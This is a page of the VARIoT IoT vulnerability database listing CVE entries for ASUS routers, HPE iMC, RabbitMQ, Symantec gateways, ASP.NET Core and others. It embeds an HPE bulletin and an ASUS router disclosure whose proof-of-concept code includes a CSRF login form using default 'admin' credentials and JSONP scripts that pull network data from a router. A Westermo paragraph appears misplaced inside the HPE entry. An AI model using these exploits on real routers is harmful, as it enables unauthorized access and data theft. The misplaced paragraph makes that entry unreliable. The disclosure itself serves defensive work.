VARIoT IoT vulnerabilities database


VAR-201711-1060 CVE-2017-8864 Cohu 3960HD Vulnerability in protection mechanism
CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
Client-side enforcement using JavaScript of server-side security options on the Cohu 3960HD allows an attacker to manipulate options sent to the camera and cause malfunction or code execution, as demonstrated by a client-side "if (!passwordsAreEqual())" test. The Cohu 3960HD contains a vulnerability related to failure of the protection mechanism. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). The Cohu 3960HD is an IP zoom camera from Cohu Corporation of the United States and is generally used as a traffic camera. The Cohu 3960HD is affected by a code execution flaw. A security vulnerability exists in the Cohu 3960HD.
VAR-201705-3128 CVE-2016-9099 Multiple Broadcom products open redirect vulnerability
CVSS V2: 5.8
CVSS V3: 6.1
Severity: MEDIUM
Symantec Advanced Secure Gateway (ASG) 6.6, ASG 6.7 prior to 6.7.2.1, ProxySG 6.5 prior to 6.5.10.6, ProxySG 6.6, and ProxySG 6.7 prior to 6.7.2.1 are susceptible to an open redirection vulnerability. A remote attacker can use a crafted management console URL in a phishing attack to redirect the target user to a malicious web site. Multiple Broadcom products contain an open redirect vulnerability. Information may be obtained and information may be tampered with. Both Symantec ProxySG and Advanced Secure Gateway (ASG) are security gateway devices from Symantec Corporation of the United States. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
VAR-201705-3129 CVE-2016-9100 Symantec ProxySG and Advanced Secure Gateway Information Disclosure Vulnerability
CVSS V2: 2.1
CVSS V3: 7.8
Severity: HIGH
Symantec Advanced Secure Gateway (ASG) 6.6 prior to 6.6.5.13, ASG 6.7 prior to 6.7.3.1, ProxySG 6.5 prior to 6.5.10.6, ProxySG 6.6 prior to 6.6.5.13, and ProxySG 6.7 prior to 6.7.3.1 are susceptible to an information disclosure vulnerability. An attacker with local access to the client host of an authenticated administrator user can, under certain circumstances, obtain sensitive authentication credential information. Service operation may be disrupted (DoS). Both Symantec ProxySG and Advanced Secure Gateway (ASG) are security gateway devices from Symantec Corporation of the United States. A remote attacker can exploit this vulnerability to obtain sensitive information.
VAR-201705-3126 CVE-2016-9097 Broadcom Advanced Secure Gateway and Symantec ProxySG vulnerability related to authorization, privileges, and access control
CVSS V2: 8.0
CVSS V3: 7.2
Severity: HIGH
The Symantec Advanced Secure Gateway (ASG) 6.6 prior to 6.6.5.8, ProxySG 6.5 prior to 6.5.10.6, ProxySG 6.6 prior to 6.6.5.8, and ProxySG 6.7 prior to 6.7.1.2 management consoles do not, under certain circumstances, correctly authorize administrator users. A malicious administrator with read-only access can exploit this vulnerability to access management console functionality that requires read-write access privileges. Broadcom Advanced Secure Gateway and Symantec ProxySG contain vulnerabilities related to authorization, privileges, and access control. Information may be obtained, information may be tampered with, and service operation may be interrupted (DoS). ProxySG and ASG are prone to an authorization-bypass vulnerability. Attackers can exploit this issue to gain unauthorized access and obtain sensitive information or elevate privileges. This may aid in further attacks. The following products are affected: Blue Coat Systems ASG 6.6 prior to 6.6.5.8 is vulnerable. Blue Coat Systems ProxySG 6.5 prior to 6.5.10.6, 6.6 prior to 6.6.5.8, and 6.7 prior to 6.7.1.2 are vulnerable. Symantec ProxySG and Advanced Secure Gateway (ASG) are security gateway devices of Symantec Corporation of the United States. Security vulnerabilities exist in Symantec ProxySG and ASG.
VAR-201802-0193 CVE-2017-5816 HPE Intelligent Management Center PLAT Input validation vulnerability
CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
A Remote Code Execution vulnerability in HPE Intelligent Management Center (iMC) PLAT version 7.3 E0504P04 was found. Authentication is not required to exploit this vulnerability. The specific flaw exists within the dbman service, which listens on TCP port 2810 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute arbitrary code under the context of SYSTEM.

The RD-305-DIN, MRD-315, MRD-355, and MRD-455 are all Westermo router devices. A number of Westermo routers have a hard-coded password vulnerability, and the devices use a hard-coded private key that allows an attacker to decrypt traffic from any other source. Multiple Westermo routers are prone to the following security vulnerabilities:
1. A hard-coded credentials vulnerability
2. A cross-site request forgery vulnerability
3. A hard-coded cryptographic key vulnerability
Attackers can exploit these issues to bypass authentication mechanisms, to perform unauthorized actions and gain access to the affected application, and to read and modify intercepted traffic.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: hpesbhf03745en_us
Version: 2

HPESBHF03745 rev.2 - HPE Intelligent Management Center (iMC) PLAT, Remote Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

The vulnerabilities could be exploited remotely to allow execution of code.

References:
- CVE-2017-5816
- CVE-2017-5817
- CVE-2017-5818
- CVE-2017-5819
- CVE-2017-8948
- ZDI-CAN-4368

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

BACKGROUND

CVSS Base Metrics
=================
Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2017-5816  9.8  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  10.0  (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVE-2017-5817  9.8  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  10.0  (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVE-2017-5818  7.5  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H   7.8  (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CVE-2017-5819  9.8  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  10.0  (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVE-2017-8948  9.8  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  10.0  (AV:N/AC:L/Au:N/C:C/I:C/A:C)

Information on CVSS is documented in HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

Hewlett Packard Enterprise thanks sztivi for working with Trend Micro's Zero Day Initiative (ZDI) for reporting these vulnerabilities to security-alert@hpe.com

RESOLUTION

HPE has made the following software update available to resolve the vulnerabilities in the iMC PLAT network products listed.

+ iMC PLAT - Version: Fixed in IMC PLAT 7.3 E0504P04
  * HP Network Products
    - JD125A HP IMC Std S/W Platform w/100-node
    - JD126A HP IMC Ent S/W Platform w/100-node
    - JD808A HP IMC Ent Platform w/100-node License
    - JD814A HP A-IMC Enterprise Edition Software DVD Media
    - JD815A HP IMC Std Platform w/100-node License
    - JD816A HP A-IMC Standard Edition Software DVD Media
    - JF288AAE HP Network Director to Intelligent Management Center Upgrade E-LTU
    - JF289AAE HP Enterprise Management System to Intelligent Management Center Upgrade E-LTU
    - JF377A HP IMC Std S/W Platform w/100-node Lic
    - JF377AAE HP IMC Std S/W Pltfrm w/100-node E-LTU
    - JF378A HP IMC Ent S/W Platform w/200-node Lic
    - JF378AAE HP IMC Ent S/W Pltfrm w/200-node E-LTU
    - JG546AAE HP IMC Basic SW Platform w/50-node E-LTU
    - JG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU
    - JG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU
    - JG747AAE HP IMC Std SW Plat w/ 50 Nodes E-LTU
    - JG748AAE HP IMC Ent SW Plat w/ 50 Nodes E-LTU
    - JG768AAE HP PCM+ to IMC Std Upg w/ 200-node E-LTU
    - JG550AAE HPE PCM+ Mobility Manager to IMC Basic WLAN Platform Upgrade 50-node and 150-AP E-LTU
    - JG590AAE HPE IMC Basic WLAN Manager Software Platform 50 Access Point E-LTU
    - JG660AAE HP IMC Smart Connect with Wireless Manager Virtual Appliance Edition E-LTU
    - JG766AAE HP IMC Smart Connect Virtual Appliance Edition E-LTU
    - JG767AAE HP IMC Smart Connect with Wireless Manager Virtual Appliance Edition E-LTU
    - JG768AAE HPE PCM+ to IMC Standard Software Platform Upgrade with 200-node E-LTU

Note: Please contact HPE Technical Support if any assistance is needed acquiring the software updates.

HISTORY
Version:1 (rev.1) - 11 May 2017 Initial release
Version:2 (rev.2) - 26 June 2017 Adding ZDI-CAN-4368 to Security Bulletin.

Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.

Report: To report a potential security vulnerability for any HPE supported product:
Web form: https://www.hpe.com/info/report-security-vulnerability
Email: security-alert@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBCAAGBQJZUpRjAAoJELXhAxt7SZaitLkH/i5U5+yIRxFll9tO2QRDRKvN
JhFxdHfr+T0beKWeLhpcuPcN6vrPsPQ60oyeHzLuz7HhWISSeaU8qIHl44GjTgPM
nIyY515SOkAmSFANBYR5CaXSv9NxuxN//qe5MDb9sJbCHoWkrvKJ8eorX0Pi4OWC
yqlmq3b1Visj8AfVX5cYGToFLwmCgbz3Q2zUYKlNNvWSfZVY15Fk931xtimHbEZF
3uHNfOXH9CL9HhKTLyuCwmJYK2zCjNlVdICDRqO12ISzffAYl7JdMGk22EXd5BCx
fOLnkISEYINImOnqI8pBuIWLO0IH12cYBxutInnGJYsR2d9hTObEh1XO373sgmo=
=TkVL
-----END PGP SIGNATURE-----
VAR-201706-0533 CVE-2017-4965 Pivotal RabbitMQ Vulnerable to cross-site scripting
CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
An issue was discovered in these Pivotal RabbitMQ versions: all 3.4.x versions, all 3.5.x versions, and 3.6.x versions prior to 3.6.9; and these RabbitMQ for PCF versions: all 1.5.x versions, 1.6.x versions prior to 1.6.18, and 1.7.x versions prior to 1.7.15. Several forms in the RabbitMQ management UI are vulnerable to XSS attacks. Pivotal RabbitMQ contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. Pivotal RabbitMQ products are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
VAR-201706-0526 CVE-2017-4967 Pivotal RabbitMQ Vulnerable to cross-site scripting
CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
An issue was discovered in these Pivotal RabbitMQ versions: all 3.4.x versions, all 3.5.x versions, and 3.6.x versions prior to 3.6.9; and these RabbitMQ for PCF versions: all 1.5.x versions, 1.6.x versions prior to 1.6.18, and 1.7.x versions prior to 1.7.15. Several forms in the RabbitMQ management UI are vulnerable to XSS attacks. Pivotal RabbitMQ contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
VAR-201705-3190 CVE-2017-5891 ASUS RT-AC* and RT-N* Device firmware cross-site request forgery vulnerability

Related entries in the VARIoT exploits database: VAR-E-201705-0277
CVSS V2: 6.8
CVSS V3: 8.8
Severity: HIGH
ASUS RT-AC* and RT-N* devices with firmware before 3.0.0.4.380.7378 have Login Page CSRF and Save Settings CSRF. The ASUS RT-AC* and RT-N* device firmware contains a cross-site request forgery vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). ASUS RT-AC* and RT-N* are both ASUS wireless router products. A cross-site request forgery vulnerability exists in ASUS RT-AC* and RT-N* firmware versions prior to 3.0.0.4.380.7378 that can be exploited by remote attackers to perform unauthorized operations.

[Original post here: https://wwws.nightwatchcybersecurity.com/2017/05/09/multiple-vulnerabilities-in-asus-routers/]

Summary

Various models of ASUS RT routers have several CSRF vulnerabilities allowing malicious sites to login and change settings in the router; multiple JSONP vulnerabilities allowing exfiltration of router data; and an XML endpoint revealing WiFi passwords. Most of these issues have been fixed by ASUS in the March 2017 firmware update under v3.0.0.4.380.7378. One issue (JSONP information disclosure) remains unfixed since the vendor doesn't consider it to be a security threat. CVE-2017-5891 has been assigned to the CSRF issues, and CVE-2017-5892 to cover the non-CSRF issues.

Vulnerability Details

RT routers from ASUS, like many other routers, come with a built-in web interface accessible over the local network but normally not accessible via the Internet. We discovered multiple issues within that web interface that can facilitate attacks on the router either via a malicious site visited by a user on the same network, or a malicious mobile or desktop application running on the same network. For the CSRF vulnerabilities, a user would need to visit a malicious site which can try to login and change settings. For the JSONP vulnerabilities, a website can load the JSONP endpoints via SCRIPT tags as long as a matching function name is defined on that site. The XML endpoint requires a mobile or desktop application to exploit.

NOTE: all of these assume that the attacker knows the local IP address of the router. This could probably be guessed or be determined via JavaScript APIs like WebRTC. For desktop and mobile applications, determination of the gateway address should be trivial to implement.

Issue #1 - Login Page CSRF

The login page for the router doesn't have any kind of CSRF protection, thus allowing a malicious website to submit a login request to the router without the user's knowledge. Obviously, this only works if the site either knows the username and password of the router OR the user hasn't changed the default credentials ("admin / admin"). To exploit, submit the base-64 encoded username and password as the "login_authorization" form post, to the "/login.cgi" URL of the router. Example of a form that can exploit this issue (uses default credentials):

<form action="http://192.168.1.1/login.cgi" method="post" target="_blank">
<input name="login_authorization" type="text" value="YWRtaW46YWRtaW4=" />
<input type="submit" />
</form>

Issue #2 - Save Settings CSRF

The various pages within the interface that can save settings do not have CSRF protection. That means that a malicious site, once logged in as described above, would be able to change any settings in the router without the user's knowledge. NOTE: We have not been able to exploit this issue consistently.

Issue #3 - JSONP Information Disclosure Without Login

Two JSONP endpoints exist within the router which allow detection of which ASUS router is running and some information disclosure. No login is required to the router. The vendor doesn't consider these endpoints a security threat. The endpoints are as follows:

/findasus.json - Returns the router model name, SSID name and the local IP address of the router:
iAmAlive([{modelName: "XXX", ssid: "YYY", ipAddr: "ZZZZ"}])

/httpd_check.json - Returns:
{"alive": 1, "isdomain": 0}

Exploit code as follows:

function iAmAlive(payload) {
  window.alert("Result returned: " + JSON.stringify(payload));
}
function alert1() {
  var script = document.createElement('script');
  script.src = 'http://192.168.1.1/findasus.json';
  document.getElementsByTagName('head')[0].appendChild(script);
}
function alert2() {
  var script = document.createElement('script');
  script.src = 'http://192.168.1.1/httpd_check.json';
  document.getElementsByTagName('head')[0].appendChild(script);
}

Issue #4 - JSONP Information Disclosure, Login Required

There exist multiple JSONP endpoints within the router interface that reveal various data from the router, including the following. Below is a list of endpoints and exploit code:

/status.asp - Network Information

function getstatus() {
  var script = document.createElement('script');
  script.src = 'http://192.168.1.1/status.asp';
  document.getElementsByTagName('head')[0].appendChild(script);
}
function show_wanlink_info() {
  var obj = {};
  obj.status = wanlink_status();
  obj.statusstr = wanlink_statusstr();
  obj.wanlink_type = wanlink_type();
  obj.wanlink_ipaddr = wanlink_ipaddr();
  obj.wanlink_xdns = wanlink_xdns();
  window.alert(JSON.stringify(obj));
}
<br/>
<button onClick="getstatus()">Load Status script</button>
<button onClick="show_wanlink_info()">Show wanlink info</button>
<br/><br/>

/wds_aplist_2g.asp - Surrounding Access points, 2.4 GHz band
/wds_aplist_5g.asp - Surrounding Access points, 5 GHz band

function getwds_2g() {
  var script = document.createElement('script');
  script.src = 'http://192.168.1.1/wds_aplist_2g.asp';
  document.getElementsByTagName('head')[0].appendChild(script);
}
function getwds_5g() {
  var script = document.createElement('script');
  script.src = 'http://192.168.1.1/wds_aplist_5g.asp';
  document.getElementsByTagName('head')[0].appendChild(script);
}
<br/>
<button onClick="getwds_2g()">Load 2G info</button>
<button onClick="getwds_5g()">Load 5G info</button>
<button onClick="window.alert(JSON.stringify(wds_aplist))">Show AP info</button>
<br/><br/>

/update_networkmapd.asp - Network map of devices on the network

function getmap() {
  var script = document.createElement('script');
  script.src = 'http://192.168.1.1/update_networkmapd.asp';
  document.getElementsByTagName('head')[0].appendChild(script);
}
<br/>
<button onClick="getmap()">Load Network map</button>
<button onClick="window.alert(JSON.stringify(fromNetworkmapd))">Show Map</button>
<br/><br/>

/update_clients.asp - Origin data

function getorigin() {
  originData = [];
  var script = document.createElement('script');
  script.src = 'http://192.168.1.1/update_clients.asp';
  document.getElementsByTagName('head')[0].appendChild(script);
}
<br/>
<button onClick="getorigin()">Load Origin</button>
<button onClick="window.alert(JSON.stringify(originData))">Show Origin</button>

/get_real_ip.asp - External IP address

function getrealip() {
  var script = document.createElement('script');
  script.src = 'http://192.168.1.1/get_real_ip.asp';
  document.getElementsByTagName('head')[0].appendChild(script);
}
<br/>
<button onClick="getrealip()">Load IP</button>
<button onClick="window.alert(JSON.stringify(wan0_realip_ip))">Show IP</button>

/get_webdavInfo.asp - WebDAV information

function getwebdav() {
  var script = document.createElement('script');
  script.src = 'http://192.168.1.1/get_webdavInfo.asp';
  document.getElementsByTagName('head')[0].appendChild(script);
}
<br/>
<button onClick="getwebdav()">Load WebDav</button>
<button onClick="window.alert(JSON.stringify(pktInfo))">Show Info 1</button>
<button onClick="window.alert(JSON.stringify(webdavInfo))">Show Info 1</button>
<br/><br/>

Issue #5 - XML Endpoint Reveals WiFi Passwords

An XML endpoint exists in the router which reveals the WiFi password to the router, but to fully exploit this issue it would require a mobile or desktop application running on the local network, since XML cannot be loaded cross-origin in the browser. This endpoint can be accessed at the following URL and requires login:
[router IP]/WPS_info.xml

Mitigation Steps / Vendor Response

Users should change the default credentials and apply the latest firmware released by ASUS, version v3.0.0.4.380.7378 or higher. There is no mitigation available for issue #3 (JSONP information disclosure without login).

Affected models include the following ASUS routers: RT-AC55U, RT-AC56R, RT-AC56S, RT-AC56U, RT-AC66U, RT-AC88U, RT-AC66R, RT-AC66U, RT-AC66W, RT-AC68W, RT-AC68P, RT-AC68R, RT-AC68U, RT-AC87R, RT-AC87U, RT-AC51U, RT-AC53U, RT-AC1900P, RT-AC3100, RT-AC3200, RT-AC5300, RT-N11P, RT-N12 (D1 version only), RT-N12+, RT-N12E, RT-N18U, RT-N56U, RT-N66R, RT-N66U (B1 version only), RT-N66W.

References

CVE-IDs: CVE-2017-5891 and CVE-2017-5892
CERT/CC Tracking # VR-627

Credits

We would like to thank CERT/CC for helping to coordinate the disclosure process. This advisory was written by Yakov Shafranovich.

Timeline

2017-01-21: Initial contact with the vendor
2017-01-23: Initial contact with CERT/CC
2017-02-05: Vulnerability details and POC code provided to the vendor, CVEs requested
2017-02-10: Vulnerability analysis received from the vendor
2017-02-12: Beta firmware provided by the vendor to test fixes
2017-02-12: Vendor fixes confirmed
2017-03-31: Fixed firmware released publicly by the vendor
2017-05-01: Draft advisory shared with the vendor and CERT/CC
2017-05-09: Public disclosure
VAR-201705-3167 CVE-2017-5892 ASUS RT-AC* and RT-N* In device firmware JSONP Information disclosure vulnerability

Related entries in the VARIoT exploits database: VAR-E-201705-0277
CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
ASUS RT-AC* and RT-N* devices with firmware before 3.0.0.4.380.7378 allow JSONP Information Disclosure such as a network map. ASUS RT-AC* and RT-N* are two router products. Attackers can exploit vulnerabilities to obtain sensitive information. [Original post here: https://wwws.nightwatchcybersecurity.com/2017/05/09/multiple-vulnerabilities-in-asus-routers/] The full Nightwatch Cybersecurity advisory, which covers both CVE-2017-5891 and CVE-2017-5892, is reproduced under VAR-201705-3190 above.
VAR-201801-0230 CVE-2017-2742 HP Web Jetadmin Resource management vulnerability
CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
A potential security vulnerability has been identified with HP Web Jetadmin before 10.4 SR2. This vulnerability could potentially be exploited to create a denial of service. HP Web Jetadmin contains a resource management vulnerability. Service operation may be disrupted (DoS). HP Web Jetadmin is a web-based print management solution that remotely configures, monitors, and diagnoses network printers.
VAR-201705-3358 CVE-2017-0247 Microsoft ASP.NET Core Input validation vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
A denial of service vulnerability exists when the ASP.NET Core fails to properly validate web requests. NOTE: Microsoft has not commented on third-party claims that the issue is that the TextEncoder.EncodeCore function in the System.Text.Encodings.Web package in ASP.NET Core Mvc before 1.0.4 and 1.1.x before 1.1.3 allows remote attackers to cause a denial of service by leveraging failure to properly calculate the length of 4-byte characters in the Unicode Non-Character range. Microsoft ASP.NET Core Contains an input validation vulnerability.Information may be tampered with. The framework is used to build cloud-based applications such as web applications, IoT applications, and mobile backends. An attacker can use this vulnerability to cause a denial of service
VAR-201705-3360 CVE-2017-0249 Microsoft ASP.NET Core Input validation vulnerability CVSS V2: 7.5
CVSS V3: 7.3
Severity: HIGH
An elevation of privilege vulnerability exists when the ASP.NET Core fails to properly sanitize web requests. Microsoft ASP.NET Core contains an input validation vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Microsoft ASP.NET Core is a cross-platform open source framework of Microsoft Corporation. The framework is used to build cloud-based applications such as web applications, IoT applications, and mobile backends. An attacker can use this vulnerability to gain access
VAR-201705-3317 CVE-2017-0256 Microsoft ASP.NET Core Input validation vulnerability CVSS V2: 5.0
CVSS V3: 5.3
Severity: MEDIUM
A spoofing vulnerability exists when the ASP.NET Core fails to properly sanitize web requests. Microsoft ASP.NET Core contains an input validation vulnerability. Information may be tampered with. The framework is used to build cloud-based applications such as web applications, IoT applications, and mobile backends. Attackers can use this vulnerability to forge requests. An attacker can exploit this issue to conduct spoofing attacks and perform unauthorized actions; other attacks are also possible
VAR-201705-3520 CVE-2016-9250 Multiple F5 BIG-IP products Vulnerability related to authorization, permissions, and access control CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
In F5 BIG-IP 11.2.1, 11.4.0 through 11.6.1, and 12.0.0 through 12.1.2, an unauthenticated user with access to the control plane may be able to delete arbitrary files through an undisclosed mechanism. Multiple F5 BIG-IP products contain vulnerabilities related to authorization, permissions, and access control. Information may be tampered with. Multiple F5 BIG-IP products are prone to a security-bypass vulnerability. Successfully exploiting this issue may allow attackers to perform unauthorized actions. This may lead to other attacks. F5 BIG-IP is an all-in-one network device integrated with network traffic management, application security management, load balancing and other functions from F5 Corporation of the United States. An attacker could exploit this vulnerability to delete arbitrary files. The following versions are affected: F5 BIG-IP Version 11.2.1, Version 11.4.0 to Version 11.6.1, Version 12.0.0 to Version 12.1.2
VAR-201705-4025 CVE-2017-8877 ASUS RT-AC* and RT-N* device firmware JSONP information disclosure vulnerability CVSS V2: 4.0
CVSS V3: 6.5
Severity: MEDIUM
ASUS RT-AC* and RT-N* devices with firmware through 3.0.0.4.380.7378 allow JSONP Information Disclosure such as the SSID. ASUS RT-AC* and RT-N* are two router products. Attackers can exploit vulnerabilities to obtain sensitive information
VAR-201705-4026 CVE-2017-8878 ASUS RT-AC* and RT-N* device firmware Wi-Fi password disclosure vulnerability CVSS V2: 4.0
CVSS V3: 6.5
Severity: MEDIUM
ASUS RT-AC* and RT-N* devices with firmware before 3.0.0.4.380.7378 allow remote authenticated users to discover the Wi-Fi password via WPS_info.xml. ASUS RT-AC* and RT-N* are two router products. An information disclosure vulnerability exists in ASUS RT-AC* and RT-N* (pre-3.0.0.4.380.7378 firmware). Attackers can exploit vulnerabilities to obtain sensitive information. ASUS RT-AC* and RT-N* devices using firmware versions earlier than 3.0.0.4.380.7378 have a security vulnerability
VAR-201705-3670 CVE-2017-6651 Cisco WebEx Meetings Server Information disclosure vulnerability allowing access to scheduled customer meetings CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
A vulnerability in Cisco WebEx Meetings Server could allow unauthenticated, remote attackers to gain information that could allow them to access scheduled customer meetings. The vulnerability is due to an incomplete configuration of the robots.txt file on customer-hosted WebEx solutions and occurs when the Short URL functionality is not activated. All releases of Cisco WebEx Meetings Server later than release 2.5MR4 provide this functionality. An attacker could exploit this vulnerability via an exposed parameter to search for indexed meeting information. A successful exploit could allow the attacker to obtain scheduled meeting information and potentially allow the attacker to attend scheduled customer meetings. This vulnerability affects the following releases of Cisco WebEx Meetings Server: 2.5, 2.6, 2.7, 2.8. Cisco Bug IDs: CSCve25950. Cisco WebEx Meetings Server (CWMS) is a set of multi-functional conference solutions including audio, video and Web conference in Cisco's WebEx conference solution. An information disclosure vulnerability exists in CWMS
VAR-201705-4230 No CVE SAP GUI Unspecified Security Bypass Vulnerability CVSS V2: -
CVSS V3: -
Severity: -
SAP GUI is prone to a security-bypass vulnerability. Remote attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions.
VAR-201705-4220 No CVE SAP Enterprise Portal Unspecified Cross Site Scripting Vulnerability CVSS V2: -
CVSS V3: -
Severity: -
SAP Enterprise Portal is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
VAR-201705-4221 No CVE SAP Netweaver Authentication and SSO Cross Site Scripting Vulnerability CVSS V2: -
CVSS V3: -
Severity: -
SAP Netweaver is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.